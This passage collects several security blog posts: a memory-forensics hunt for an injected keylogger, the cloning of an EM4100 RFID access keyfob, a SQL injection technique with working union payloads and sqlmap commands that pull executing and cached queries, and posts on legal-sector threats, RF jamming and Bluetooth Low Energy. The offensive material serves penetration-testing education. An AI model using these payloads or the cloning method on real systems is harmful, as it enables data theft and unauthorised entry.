--SNIP--

So, kernel, ccSvcHst, Rtvscan and explorer all have references to the file path in their process memory space.

ccSvcHst and Rtvscan are both components of the Symantec endpoint protection software installed on the system. It's reasonable that the AV would be listing the file for a variety of reasons, but explorer is slightly odd. Explorer is spawned when one uses an open or save file dialog, but that seems unlikely for a malicious file. The explorer process definitely warrants a closer look.

A closer look at explorer.exe

Checking the md5 of explorer.exe we can be happy that explorer itself hasn't been tampered with. Perhaps a DLL is being injected. Of course, Volatility provides a plugin with which we can check what DLLs a process has loaded; the appropriately named dlllist.

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 dlllist --pid=4628
************************************************************************
explorer.exe pid:   4628
Command line : C:\Windows\Explorer.EXE
Service Pack 1

Base                             Size          LoadCount Path
------------------ ------------------ ------------------ ----
0x00000000ffe90000           0x2c0000             0xffff C:\Windows\Explorer.EXE
0x00000000777b0000           0x1a9000             0xffff C:\Windows\SYSTEM32\ntdll.dll
0x0000000077690000           0x11f000             0xffff C:\Windows\system32\kernel32.dll
0x000007fefd900000            0x6b000             0xffff C:\Windows\system32\KERNELBASE.dll
--SNIP--
0x000007fef5930000            0x15000                0x1 C:\Windows\Installer\WinInstall.dll
--SNIP--

There were actually 215 DLLs loaded by explorer. (In case you're thinking 215 sounds suspiciously high, it's not. If you've got 'Process Explorer' to hand, check your own explorer.exe - I bet you've got around 200 loaded.)

So, scrolling down the list preparing myself to have to check the md5 of each, I noticed the one between the snips above: C:\Windows\Installer\WinInstall.dll. This folder is immediately suspicious: there aren't normally DLLs in the root of the Installer folder.

The easy option here would be to fire up the hard disk image and take a look at the file, but:

  1. we're showing off memory skills here, and
  2. I don't have the hard disk drive image.

But that's fine, because Volatility also includes a dlldump plugin. No prizes for guessing that it dumps DLLs.

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 dlldump --pid=4628 --dump-dir=4628
Process(V)         Name                 Module Base        Module Name          Result
------------------ -------------------- ------------------ -------------------- ------
0xfffffa8003a766f0 explorer.exe         0x00000000ffe90000 Explorer.EXE         OK: module.4628.74a766f0.ffe90000.dll
0xfffffa8003a766f0 explorer.exe         0x00000000777b0000 ntdll.dll            OK: module.4628.74a766f0.777b0000.dll
0xfffffa8003a766f0 explorer.exe         0x0000000002130000 apphelp.dll          OK: module.4628.74a766f0.2130000.dll
0xfffffa8003a766f0 explorer.exe         0x0000000180000000 igfxpph.dll          OK: module.4628.74a766f0.180000000.dll
--SNIP--
0xfffffa8003a766f0 explorer.exe         0x000007fef5930000 WinInstall.dll       OK: module.4628.74a766f0.7fef5930000.dll
--SNIP--

This article isn't the place to get into the analysis of the DLL, but if we do strings against the file we get some pretty damning clues...

--SNIP--
[Right SHIFT]
[Left SHIFT]
[SCROLL LOCK]
[NUM LOCK]
[F12]
[F11]
[F10]
--SNIP--
Global\Klogger
--SNIP--
[%02d/%02d/%d %02d:%02d:%02d] (%s)
RegisterRawInputDevices
User32.dll
GetRawInputData
user32.dll
%s\%s_tmp.dat
KLogger
--SNIP--
E:\Code\Keylog\KloggerDll\x64\Release\KloggerDll.pdb
--SNIP--

It's easy enough to see:

  • Keylogger key mappings, e.g. the right shift key becomes [Right SHIFT]
  • A timestamp and message format string: [%02d/%02d/%d %02d:%02d:%02d] (%s)
  • The name of two Windows API functions to do with getting raw input.
  • A format string for our file name: %s\%s_tmp.dat
  • And generally, terms to do with 'logger'.

How is the DLL injected into explorer?

All that's left for us to do now is to see how the DLL is being injected into the explorer process.

I fully expected this to be a key/value pair in the Registry, so because we're staying in memory, let's use Volatility's dumpregistry plugin to, well, dump the Registry files from memory to disk:

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 dumpregistry --dump-dir=reg

We end up with a file listing like this:

 Volume in drive C has no label.
 Volume Serial Number is 1234-5678

 Directory of C:\reg

14/01/2015  09:21    <DIR>          .
14/01/2015  09:21    <DIR>          ..
23/12/2014  12:10             8,192 registry.0xfffff8a00000f010.no_name.reg
23/12/2014  13:57        22,675,456 registry.0xfffff8a000023290.SYSTEM.reg
23/12/2014  12:10           282,624 registry.0xfffff8a00006b410.HARDWARE.reg
23/12/2014  12:10        66,224,128 registry.0xfffff8a001bf7410.SOFTWARE.reg
23/12/2014  12:10            40,960 registry.0xfffff8a004071010.SECURITY.reg
23/12/2014  12:10            36,864 registry.0xfffff8a0040dc410.SAM.reg
23/12/2014  12:10           245,760 registry.0xfffff8a004153410.NTUSERDAT.reg
23/12/2014  12:10           249,856 registry.0xfffff8a00431d410.NTUSERDAT.reg
23/12/2014  12:10         4,128,768 registry.0xfffff8a004ef8010.ntuserdat.reg
23/12/2014  12:10         6,733,824 registry.0xfffff8a005405010.UsrClassdat.reg
23/12/2014  12:10         5,808,128 registry.0xfffff8a00712f010.Syscachehve.reg
23/12/2014  12:10           286,720 registry.0xfffff8a007c9f010.DEFAULT.reg
              12 File(s)    106,721,280 bytes
               2 Dir(s)  69,660,389,376 bytes free

Next step, lets see if we can quickly identify which of these files contains a reference to WinInstall.dll:

C:\>strings.exe reg\*.reg | findstr /I /L WinInstall.dll
FINDSTR: Line 662056 is too long.

So one line is too long, that's normal, but there are no results. That is unexpected.

What about the folder in which the file resides:

C:\>strings.exe reg\*.reg | findstr /R C:\\Windows\\Installer\\.*dll
C:\reg\registry.0xfffff8a000023290.SYSTEM.reg: C:\Windows\Installer\adspack.dll
C:\reg\registry.0xfffff8a000023290.SYSTEM.reg: C:\Windows\Installer\adspack.dll
FINDSTR: Line 662056 is too long.

So now we have a SECOND DLL in the C:\Windows\Installer folder?! That's suspicious. Is THAT dll loaded by any processes?

Let's see if 'adspack.dll' appears anywhere.

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 dlllist >dlllist_all.txt
--SNIP--
************************************************************************
svchost.exe pid:   2816
Command line : C:\Windows\system32\svchost.exe -k netsvcs
Service Pack 1

Base                             Size          LoadCount Path
------------------ ------------------ ------------------ ----
0x00000000ffdb0000             0xb000             0xffff C:\Windows\system32\svchost.exe
0x00000000777b0000           0x1a9000             0xffff C:\Windows\SYSTEM32\ntdll.dll
0x0000000077690000           0x11f000             0xffff C:\Windows\system32\kernel32.dll
--SNIP--
0x000007fef85e0000            0x25000                0x1 c:\windows\installer\adspack.dll
--SNIP--

Our mystery dll is loaded by svchost - a service?

Let's grab a copy of this file:

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 dlldump --pid=2816 --dump-dir=2816
Process(V)         Name                 Module Base        Module Name          Result
------------------ -------------------- ------------------ -------------------- ------
0xfffffa80032a0b30 svchost.exe          0x00000000ffdb0000 svchost.exe          OK: module.2816.752a0b30.ffdb0000.dll
0xfffffa80032a0b30 svchost.exe          0x00000000777b0000 ntdll.dll            OK: module.2816.752a0b30.777b0000.dll
--SNIP--
0xfffffa80032a0b30 svchost.exe          0x000007fef85e0000 adspack.dll          OK: module.2816.752a0b30.7fef85e0000.dll
--SNIP--

And take a look at it in MiTeC's EXE Explorer.

A 'ServiceMain' function is exported...

...and there's a resource called 'DLL', which IS WinInstall.dll:

Analysis of this DLL shows that it runs as a service, drops WinInstall.dll and injects it into explorer.

We already know from above that this DLL is referenced in the SYSTEM hive, so it's a quick check (with MiTeC's Windows Registry Recovery) to see precisely where:

So, as we can see, a service called Ias is started at boot using adspack.dll.

Bullet-Point Summary

  • On start-up, a service called 'Ias' is started the binary for which is C:\Windows\Installer\adspack.dll.
  • This dll drops another dll, C:\Windows\Installer\WinInstall.dll, which is a keylogger.
  • This keylogger is injected into the explorer.exe process.

Contact and Follow-up

Adam is part of our Response team in Context's Cheltenham office. See the Contact page for how to get in touch.

Appendix: Get Lucky! A keylogger has to log key strokes.

As we're hunting a keylogger, we can consider something a keylogger has to do: log keystrokes that can't be represented by a printable character. For example: backspace, enter, home, end, etc. Often, as was the case in this instance, keyloggers represent these unprintable characters as the literal name within square brackets, for example: [ENTER]. We could have looked for that with strings again:

C:\>strings -o -n 11 hiberfil.dd | findstr /I /L "[BACKSPACE]" >backspace.txt

Which gives an output of:

834782000:[BACKSPACE]
1165946328:[BACKSPACE]

OK! So, we have a couple of matches. Back to our strings plugin:

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 strings -s backspace.txt	
834782000 [4628:7fef593b330] [BACKSPACE]
1165946328 [2816:7fef85fcdd8][BACKSPACE]

Nice! So, we have two processes that contain the string:

  1. 2816 svchost.exe
  2. 4628 explorer.exe

So, explorer.exe has hit again, and svchost.exe is of course the process responsible for launching services. This would have identified our two processes too, but those unprintable characters could've been encoded in any kind of way - looks like our attackers were just a little lazy.

RFID Tags in Access Control Systems

$
0
0
One of our recent engagements required us to explore an unknown RFID tag which was used as part of an access control system. The objective of this engagement was to find out how the RFID tag communicates with the reader, and if possible to clone the tag. As we did not have any further information or documentation about the access control system, we had to start from scratch.

Common RFID Frequencies

Whenever it comes to testing a RFID tag we need to know on which frequency the signal between the tag and the reader is transmitted. The most common frequencies are:

  • 120-125kHZ (Low Frequency)
  • 13.56 MHz (High Frequency)
  • 433 MHz (Ultrahigh Frequency)

Low frequency tags operate on a range of 10cm and are commonly used as part of animal identification, factory data collection or simple access control systems. High frequency tags operate on a range between 10cm up to 1m and are commonly used in contactless payment systems or public transport tickets (such as the Oyster card). Ultrahigh frequency are more likely to be found within warehouse logistics as those operate on  a wide range between 1m up to 100m.

Additionally, RFID tags can be separated into two different groups, namely active and passive. Active means that a battery is attached to the RFID tag and a signal is transmitted all the time. Passive means that the RFID tag is only active if a RFID reader is near the tag so that it can use the energy from the radio waves of the reader.

Setup

The setup for this engagement consisted of a keyfob and a RFID reader. By having a look at the two components it was not possible to get any further information except the fact that a 10 digit HEX number was printed on top of the keyfob which is likely a unique ID and that it is probably a passive tag as we could not see any battery inside.

The next step to receive further information about the tag was placing it on a high frequency and a low frequency antenna and then reading data samples from the stream. For this, we used a proxmark3 device which can not only be used as a RFID reader and writer but also to simulate a data stream. Placing the keyfob on the high frequency antenna did not show any data transmitted, but placing the keyfob on the low frequency antenna showed that data is transmitted, and that the keyfob is therefore a low frequency RFID tag. Reading around 20000 data samples from the transmitted data stream resulted in the following graph:

proxmark3> data samples 20000

proxmark3> data plot


The graph above shows taken samples from the data stream by which each sample was taken in the same interval. The exact wave form is not needed as only 'ones' (up) and 'zeros' (down) are transmitted.

Analysis

At this point we already saw that the same signal is repeated after some time, and reading more samples from the transmitted data stream proved this. The fact that the same signal is repeated after some time means that it is very likely that no nonce is used against replay attacks and that we could just sniff the transmitted stream and then emulate it when near the reader in order to get access. Commonly, those transmitted streams are encoded and in order to decode the data stream we first had to demodulate it by using Amplitude-Shift Keying (ASK), which is a form of amplitude modulation that represents digital data as variations in the amplitude of a carrier wave. The plotted graph looked liked the following:

One of the most common data encoding used when transmitting data in telecommunication is the so called Manchester Encoding and this was our first try when it came to decoding the signal. The encoded data can be retrieved by using a XOR operation of the Clock and Manchester Value which is also shown in  the following image:


After successfully decoding the signal we retrieved the following bit stream which also showed the previously identified recurrence in the plotted graph of the transmission stream:


The final bit stream consisted of 64 bits and the following assumptions were made to finally decode the stream. The keyfob had a 10 digit hex number printed on top of it, which can also be represented by its binary representation (e.g. 0000 = 0, 1111 = F, ...). Additionally, it is very likely that the 9 bits at the beginning of the bit stream are some kind of header which tells the reader about the start of the transmission. Summing up all the assumptions results in 10 * 4bit + 9 * 1 bit = 49bits. For the leftover 15 bit we assumed that those are used as checksums or parity bits - having checksums in RFID based systems is very likely as the transmitted traffic might be disrupted by other signals or by its bad transmission signal.

Reading through various manuals and specifications showed that one possible protocol could be the EM4100 protocol. The EM4100 protocol consists of a 64 bit data stream, uses a 9 bit header (all set to 1), 8 bit version information, 32 Data bits and 14 parity bits and one stop bit (set to 0). Putting all information together resulted in the following table in which the parity bit was calculated by a XOR operation:


Taking all bits from the version and data section and converting those to hex gave us the following ID 01068B6120. Unfortunately, this was not the number printed on top of the keyfob, but we were not discouraged by this and went on - as it might be that it was just changed for security purposes. The next step to clone the keyfob's ID to another tag was quite simple as we just had to take a blank T55x7 RFID tag - those support the EM4100 protocol- and write the ID to it, so that it is repeated whenever it is powered on by the electromagnetic field of a reader.

Beeeeeeeeeeep - That was the sound we heard when the door finally opened.

Solution

RFID systems which use a static ID for authentication are pretty common and a cheap solution when it comes to access control systems or tracking working hours of employees in an office. However, this should not be used to protect security sensitive areas or information. A more recommended way to do this is using a RFID card which supports encryption and measurements against replay attacks - but even those might be vulnerable to other attacks such as the Mifare Classic card...but this is another story.

Contact and Follow-Up

Christian is a part of our Assurance team in Context's Essen office, Germany. See the Contact page for how to get in touch.

SQL Inception: How to select yourself

$
0
0
In this blog post I will describe a few ways to view the whole SQL statement being executed as part of a SQL injection attack. Currently, unless the vulnerable page returns the SQL statement in an error message, performing an attack involves an amount of guesswork by the attacker. The more complicated the original SQL statement, the more difficult it can become to extract data using faster UNION based techniques.

If the type of injection is blind then this can take time to perform and cause a lot of traffic to be generated, especially when extracting a significant amount of data from the database. This prompted the question - “Wouldn’t this be a lot easier if I could see the SQL being executed?”

Databases Store Queries in Tables

So far I have discovered methods of extracting the original SQL query via a SQL injection attack on Oracle, Microsoft SQL Server, MySQL and Postgres databases. Other methods and techniques may exist with these and other databases however I find these four to be quite common and they have been my focus for this blog post.

For Oracle and MS SQL databases, the query locations that I found require a relatively high privilege account to perform but they also offer the ability to see other queries that have been executed before and by other users. Furthermore, these locations could contain sensitive information such as credentials / hashes and highlight the use of SQL functions and stored procedures which would allow for a much greater understanding of how the application works.

MySQL and Postgres

The SQL queries that I used to extract the current running query for these two databases are as follows:

Postgres(*)         Select current_query from pg_stat_activity

MySQL               Select info from information_schema.processlist
(*) – For Postgres, the column name is different depending on the version used. If ‘current_query’ doesn’t work try just ‘query’.

When extracting information from these tables it is important to consider what is happening. The database itself will be trying to use these tables at the same time as the web application that we are injecting so occasionally it may report as empty. In my use of this so far, most of the time the query has worked fine in the real world.

To test these new techniques, I created a vulnerable web application with a needlessly complicated query and used the above as custom queries in a popular SQL injection tool called SQLMap.

In the following example, the vulnerable application is a single web page with a MySQL backend.

http://localhost/test/vuln.aspx?album=1465

We can confirm that it is injectable by using payloads like:

  • 1466-1
  • 1465 order by 1
  • 1465 order by 2

Furthermore, we know from using ‘order by 3’ that there are only two columns being returned however the following only returns our original row:

  • 1465 union all select null,null

We can still use SQLMap to extract data from the database, as it will find that blind Boolean and time based techniques are working but if we want to extract a lot of data quickly we will need to find out what else the query is doing. For this we can use SQLMap to execute one of the above queries using the --sql-query switch which will return the full SQL statement that is being executed.

sqlmap –u “http://localhost/test/vuln.aspx?album=1465” 
–-sql-query=”select info from information_schema.processlist”


Fig .1 - SQLMap output showing the original query on MySQL database

Removing the SQL that SQLMap injects we can see the following statement which is being executed by the application including a SQL comment that was left in for demonstration purposes.

Select title from (
select asin,title
from album
where rank = 1465) as test
where asin like 'B0000%' -- Misc Comment

With the query visible, we can see that it is checking the first column in the outer select for a value like ‘B0000%’ so if we use the following as a payload, we should be able to extract data much faster.
  • 1465 union all select ‘B00000’,TABLE_NAME from INFORMATION_SCHEMA.TABLES


Fig.2 - List of table names from the database appended to the normal results

MS SQL and Oracle

Both MS SQL and Oracle store cached queries that can be accessed by high privilege accounts. For an attacker, this allows us to not only select the current query, but also allows us to access other queries that have been executed as well. This could reveal credentials, function names, stored procedures as well as scheduled jobs that are being executed by the application. For the purpose of this blog however, I will focus on the ability to retrieve the current query.

MS SQL 2005+        SELECT st.text from sys.dm_exec_cached_plans
                    cp cross apply sys.dm_exec_sql_text(cp.plan_handle) st

Oracle              select SQL_TEXT from v$sql
It’s important to note that both of these resources will have more than one row and in particular when using blind SQL injection each row could correspond to a variation on the injection.

For example, if SQLMap were to send 500 requests to retrieve the current query then these cache tables will at least contain these 500 SQL queries. This poses a problem when performing blind SQL injection because the number of rows will increase with each request. A technique that we can use would be to include criteria in the custom sql-query search terms so that we only select one row which contains something that we are expecting such as a particular ID.

To test this I changed the database in my application to Oracle and together with the vulnerable parameter we can craft a SQLMap command as follows.

sqlmap –u “http://localhost/test/vuln.aspx?album=513” 
-–sql-query=”SELECT SQL_TEXT from v$sql
where SQL_TEXT like '%513%'
and SQL_TEXT not like '%v$sql%' and ROWNUM = 1”

Here we attempt to select just the one row from the cache tables that contain our ID 513 but which doesn’t contain references to the cache table such as v$sql. This is so that we don’t select all of the queries that SQLMap will perform which could be 100’s or even 1,000’s. The result is similar to the earlier examples, except we are now able to retrieve the original query without returning the injection SQL statements that SQLMap executes.


Fig.3 - SQLMAP output showing the extracted query

This produces the following result:
select title from (
select asin,title
from album
where rank=513) where asin like ‘B0000%’ – Misc Comment

With both MS SQL and Oracle, we can go a step further and select other queries that have been executed which can allow us to examine the other database calls that an application makes. This can include the use of stored procedures, functions, and scheduled tasks as well as the possibility to retrieve information such as credentials for an application if they are selected from a table.

Knowing how to perform the UNION ALL on this vulnerable web page and with the following payload, we can query the Oracle v$sql table to return all of the queries that have been executed recently. Since this application is quite simple there isn’t much that stands out however on a real application this table would contain a lot of different queries possibly dating back days, weeks or even months.

http://localhost/test/vuln.aspx?album513+union+all+select+’B000000’,SQL_TEXT+FROM+v$sql

As we can see from the results below, there is quite a lot of potentially useful information here and the queries seem to persist for quite some time.


Fig.4 - Contents of the v$sql table on an Oracle DB.

Future Research

As well as enabling a greater understanding of SQL injection vulnerabilities, I hope that this technique may also enhance the current SQL injection tools available. Using these methods, it may be possible for a tool to extract the query first and use the results to modify the behaviour of the tool making them more efficient.

I intend to do more research to try and identify other methods of retrieving this information with lower privilege accounts and also to extend the list of databases to gain a more  complete coverage of this technique.

Contact and Follow-Up

Aaron is part of our Assurance team in Context's London office. See the Contact page for how to get in touch.

Breaking the law: the legal sector remains an attractive target; why not turn cyber security into an opportunity?

$
0
0

The legal sector will remain an attractive target for the full spectrum of threat actors; cyber-criminals, hacktivists, state-sponsored groups. Unsurprisingly, this is due to the wealth of sensitive data held within the industry; patent data, merger and acquisition information, negotiation information, protected witness information. The scope is vast and not limited to the above list. Legal firms are equivalent to a pot of gold for any of these groups.

For example, criminals might target you because (they hope) that you hold significant amounts of money in your accounts (both corporate and personal). Hacktivists might target you because of your work in a particular area of law or because of specific clients that you may represent. State-sponsored groups may target you to obtain sensitive merger and acquisition information, or compromise your website in order to target a refined element of your client base. The problem is not going away.

Cyber security is often seen as an inconvenience. A substantial cost that you will never see a return of investment for. However, this is changing. In a world where contracts are won and lost on the basis of very small margins, each differentiator counts. Information security and protection of client data is increasingly seen as a key differentiator.

The government sponsored Cyber Essentials scheme is a great avenue for this. It gives businesses the chance to obtain an accreditation against an assurance framework that seeks to mitigate the most common cyber threats. This accreditation will demonstrate to your customers that you have taken essential precautions in order to better protect their data; an attractive selling point. Context is an approved accreditor of this scheme.

Employee awareness is also essential. By giving employees an awareness of the cyber threat and practical tips for how to better protect themselves and the organisation; it can engender a real cooperative approach to security. Security is a shared responsibility across an organisation and by empowering staff with knowledge you are increasing your ability to detect a compromise quicker; whilst enriching your employees with new skills and information. Context offers threat awareness briefings to staff, which give a high level overview of the threat but also cover how employees might be impacted directly; for example by Ransomware or phishing/spear-phishing attacks.

The threat landscape is continually expanding and ever changing. Increasingly, we are seeing criminal groups targeting corporate entities as opposed to just speculatively targeting individuals for financial gain. The malware used in these attacks is increasingly becoming more sophisticated and covert. In part, this is due to the proliferation of sophisticated malware via underground forums. In addition, hackers for hire, a worrying development, allow nation states with limited capabilities in this area to rapidly acquire the tools to deploy cyber-attacks in order to obtain intellectual property and sensitive data. Unfortunately, law firms will be at the top of the list for these groups for all the reasons outlined at the start of this post. Stay ahead of the curve; seize the opportunity to be a leader within your sector; protect your clients and your interests whilst attracting some new business along the way.


Tom is a part of our Response team in Context's London office, please refer to the contact page to get in touch.

Wireless Gridlock in the IoT

$
0
0


“What good is a phone call when you are unable to speak?”

Introduction

When people mention the Internet of Things (IoT) and congestion they’re likely referring to novel solutions to urban traffic control, not the less discussed fragile and limited radio spectrum, which presents its own security risk at a time when systems are becoming increasingly dependent on it.  

The explosive growth in home, wearable and vehicular wireless devices has not been matched by a proportionate growth in radio spectrum bands to accommodate them. This dilemma is creating a growing congestion problem which owners of wireless networks, bandwidth hungry teenagers or value baby-monitors know only too well. This presents a genuine and growing security issue to the availability of critical information stored in the cloud and dependent on the already vulnerable and limited RF spectrum to convey it. Denial of service is no longer a nuisance; it is lethal to modern systems and economies.

Discrete wireless networking technology (Bluetooth, WiFi, Zigbee) is proliferating at an ever increasing rate right across industry sectors, much faster than spectrum management or standards bodies can keep on top of or practically test. The ubiquitous Industrial, Scientific and Medical (ISM) radio band at 2.4GHz in particular is heavily oversubscribed due to its unlicensed nature and could become all but unusable for priority systems in a desely populated area in the future at the present rate of growth of 2.4GHz transmitters and networks.

The crux of the problem is that the oversubscribed ISM bands are unmanaged so whilst your company might exercise diligent planning of your wireless network(s), the growing number of local devices within range will pump out RF energy into the same narrow slice of spectrum without a care for your planning - or devices. In addition, vendors will be more than happy to tell you their wireless device ‘just works’ and gloss over the critical issue of the overcrowded, unmanaged, RF spectrum it relies upon. Devices need only comply with the radiation regulations for your country, set by ETSI in Europe, but are not required, or practically tested, to work in harmony with other devices. Value baby-monitors are nicknamed  ‘RF jammers’ for good reason.

Harmony through design

Wireless standards like IEEE 802.11 (WiFi) were designed with high capacity and congestion in mind [1]. Features such as engineered channel spacing (guard channels), distinct channels (14 channels in the UK), and agile modulation techniques like Direct Sequence Spread Spectrum (DSSS), Frequency Hopping Spread Spectrum (FHSS) and Orthogonal Frequency Division Multiplexing (OFDM) allow efficient sharing of the limited spectrum whilst providing the high data rates consumers demand. Further restrictions by Telecommunications authorities like ETSI in Europe restrict device power output to 20dBmW (0.1W), thereby severely limiting the impact of a device.

These advanced design features do indeed allow multiple systems to share the same channel but they won’t provide indefinite harmony. The scale of the IOT will stretch them to breaking point.


Bluetooth (IEEE 802.15.1) is marketed as a distinct communications technology for portable devices but operates in exactly the same 2.4GHz band as WiFi. It is designed to fail gracefully when it cannot communicate on a channel so many users are oblivious to interference. Despite it using frequency hopping modulation (FHSS), and WiFi using (different) frequency hopping modulation (DSSS), the two incompatible standards are still capable of interfering with each other resulting in bit errors and reduced speeds [5].

Why your WiFi is slow… and getting slower

Despite advanced interference counter measures, the sheer quantity and variety of devices from wristwatches to CCTV competing for bandwidth in the narrow slice of ISM spectrum, especially in cities, is causing increased bit error rates (BER) through collisions and packet retransmissions which manifests itself as slow WiFi and even WiFi rage[2].

Channel management by users is voluntary and even if done well, is likely at odds with your neighbours’ channel management plan. Even if you harmonise channels in your office with additional spacing (a DSSS signal overlaps the two channels either side), sooner or later someone or something will be on ‘your’ channel(s). Hopefully they’ll be compliant with ETSI regulations but even then there’s a healthy limit (it’s 3) to the number of independent DSSS signals in the same location which can be calculated when you know how many bits are in the spreading sequence. The 802.11 standard has an 11-bit long spreading sequence which needs 30MHz spacing between carriers. Any closer and they’re interfering. The amount of interference will be proportionate to the amount of overlap and signal power [3].  Having three or more signals on the same channel won’t cause anarchy but it will reduce performance by a factor determined by the power of the interfering signals which may well be enough to impact the availability of your critical information.

Congestion has already spawned a market in products designed to beat the traffic either through intelligent multi-path antenna design (MIMO routers) or cruder high gain antennas designed to ‘boost’ your signal usually at the expense of other users – which is allowed because it’s unmanaged spectrum after all. Vendors shouldn’t exceed ETSI radiation regulations or deliberately interfere with other’s use of the spectrum as that would be an offence under the (UK) Wireless Telegraphy Act (WTA).

The WiFi’s slow, so what?

In the information security triangle of Confidentiality, Integrity and Availability, interference presents a real threat to the availability of data and services, increasingly cloud based. Not being able to stream a HD movie is a ‘first world problem’ but not being able to activate the remote lock on your house or car or access your critical data or system when you need it is a more serious issue with real world consequences.

  • Cars fitted with convenient wireless security systems have for some time now been targeted with deliberate RF interference by thieves. The thief jams the lock signal as the owner leaves the vehicle with a cheap jammer requiring no technical knowledge or skill to operate [4]
  • The surge of affordable drone usage in the ISM band has seen a new, expensive, phenomenon called ‘fly-aways’ when a drone fails to communicate with its controller [6]. RF Interference is a known issue which is understandable as at 20dBmW (ETSI limit), a signal at 2.4GHz will propagate only a few hundred metres through free space before it is too weak to receive with normal receivers.  The practical maximum range of a Drone will vary greatly between quiet rural environments with a low RF noise floor and a noisy, cluttered city where the Drone’s signal will have to contend with attenuating obstacles, signal multipath and other co-located systems on the same band.

  • An unnamed UK intensive care hospital invested in an 802.11 VoIP staff communications system which staff rely on to contact each other - often in an emergency. The devices are clients to a building-wide 802.11 network which shares not only the unmanaged spectrum with non-critical networks, but also the very same channel with a much higher bandwidth patient entertainment network resulting in occasional critical communications failure (or jittery cartoons depending on your POV). Basic channel management would help but a better solution for a critical system would be dedicated, licensed, spectrum instead of the Wild West that is the ISM band.

If you run a business where wireless systems feature heavily then you’re vulnerable to a physical denial of service in the form of unintended or deliberate interface (Jamming). (You’re also using more power as it costs more wattage to send a packet between computers via WiFi than by Ethernet). An RF jammer can be assembled or bought for very little and the growing hobbyist Software Defined Radio market has seen the price of entry level transceivers capable of transmitting across licensed and unlicensed bands fall drastically which when coupled with an equally affordable signal amplifier and directional antenna can deny wireless communications at long range. This means the barrier to entry into the previously exclusive world of Electronic Counter Measures (Military jargon for radio jammers) has fallen and trouble will follow. Expect and plan for interference, deliberate or otherwise.


                                                                Representative SDR Jammer with power amplifier

Solutions

Faced with this dilemma, what can you do to offset the hordes of competing IOT devices that are mushrooming and the emerging threat from attackers armed with powerful SDR jammers from compromising the availability of your critical information?

Thankfully, standards bodies are developing future standards to address congestion and capacity issues but in the meantime here’s a check-list of tips to help you enjoy interference free wireless networking:

  • Plan for radio failure. Have an alternative ready, ideally an Ethernet cable into your network.
  • If you are going to put your business in the cloud, access it via a reliable, wired, route.
  • For mobile users of critical and/or valuable systems, ask yourself if using the unmanaged spectrum is the best         choice. WiFi might well be faster than 3G but it’s a free for all, unlike the carefully managed GSM bands which cost telecoms companies billions. WiFi is cheaper for a reason.
  • De-conflict your local spectrum. Have a scan with one of the many smartphone apps like Wifi Analyzer for Android or airodump-ng for Linux which will reveal your 802.11 neighbours and note their WLAN channels. Get your wireless base stations on a channel as far from other systems as possible. Do the same for Bluetooth. Repeat periodically.
  • Take an interest in the frequency bands before you buy another convenient ‘wireless’ device. Favour devices which use less common bands such as the higher 5.8GHz ISM band used by 802.11n. Aim for diversity of your spectrum footprint rather than having them all sit in the same overcrowded 2.4GHz band waiting for trouble to come your way.
  • Pay attention and investigate incidents of slow speeds. As well as being an indicator of someone hogging all the bandwidth, it is also a symptom of an interfering system causing increased bit errors and packet retransmissions on your channel.
  • If all else fails, move to the Outer Hebrides, but be warned there's a Radar test facility already there...


The Emergence of Bluetooth Low Energy

$
0
0



Introduction

This blog is about Bluetooth Low Energy (BLE), which is the relatively new, lower-power version of the Bluetooth protocol. BLE was introduced in version 4.0 of the Bluetooth Core Specification, which was released in June 2010. The idea was to redesign the Bluetooth protocol to low power consumption and cost, for use in a new set of applications. Crucially, BLE is not compatible with traditional Bluetooth, although the specification does allow for devices to implement either or both of the protocols. As we’ll show, the changes made to BLE allow it to work in a very different manner to traditional Bluetooth.

It’s a technology that piqued the interest of our Research team, purely because of one interesting application: iBeacons. That initial spark has resulted in a few different strands of work, all of which are covered here.

In the beginning – iBeacons

All of this started when Paul in our Research team read about iBeacons online, and bought two cheap ones on Amazon. After a while he brought them into the office for us to play with. An iBeacon is a BLE device with one function: to constantly broadcast BLE packets containing just a serial number that uniquely identifies the iBeacon.


As the name suggests, iBeacons are an Apple protocol, and many of the early applications are very iOS-centric. The following section covers the technology in more detail, but using BLE means that they can run from a coin-cell battery for a couple of years, something that wouldn't have been possible with traditional Bluetooth.

To make use of an iBeacon, you typically need a mobile application that looks for them, and knows what to do when it finds them.  In the UK, both BA and Virgin had added iBeacons into their airport lounges, so the application that is already used to show a boarding card can detect when you walk into the lounge, and tell you the WiFi password for that day.

A number of companies and organisations are already using or experimenting with iBeacons, for example Major League Baseball, Apple themselves, House of Fraser, Regent Street (the BBC have a video) and Waitrose.

Whilst location-based services aren’t new, using BLE means that location-aware applications can work simply by receiving BLE packets, which have a longer range than RFID, but don’t consume as much power to scan for as WiFi or GPS.

Google quietly introduced a similar mechanism in Android 5.0, with Android Trusted Places and Trusted Devices. This allows your Android device to automatically unlock when it’s in a trusted place, or when it is in range of a trusted device, such as a Bluetooth device.

Another novel BLE application is Google Physical Web, their iBeacon-like specification to push out a URL via BLE packets. Implementing an URIBeacon, as they are called, is straightforward. This is particularly true if you make use of ARM’s mbed framework, which has sample code for many BLE applications, including URIBeacons. A free mbed account lets you write and compile code from the mbed web interface.

Thankfully many of the initial applications of iBeacons require you to be using a specific application already. One of the first questions on the Google Physical Web introduction is “will you be pestering people with alarms?” Encouragingly, they say that “a core principle of this system is no proactive notifications” (their emphasis). It wouldn't be too surprising, however, to see a handset manufacturer supplying devices with a pre-installed iBeacon app that allows its partners to push location-based adverts at people. You can at least turn off Bluetooth on your phone.

Whilst iBeacons were the first BLE technology we came across, there are a surprisingly large number of devices out there that are already using it.

Other applications

Later sections cover the work we've done to survey BLE devices already in use, some of which are surprising, but many that people would expect. One of the most topical applications for BLE is in wearable technology and fitness trackers, about which there is a lot being written. Being small and low powered and requiring regular updates, BLE is an obviously suitable protocol for them to use.


Whilst many people are aware of fitness trackers (e.g. FitBit, Jawbone) and heartrate monitors, and Bluetooth headsets aren't new, not many people would guess at combining the two to produce headphones that measure your pulse from inside your ear like the Jabra Pulse does.

The Apple Watch presumably supports it, but we can’t tell from the technical specifications as they only state that is supports Bluetooth 4.0, which includes BLE but also traditional Bluetooth.

And finally, If you’re looking to “enrich your sleep experience”, there’s always the Withings Aura .

Before we cover the work we've done on BLE, it’s worth taking a look at some of the important aspects of the technology.

The technology and why it matters

History

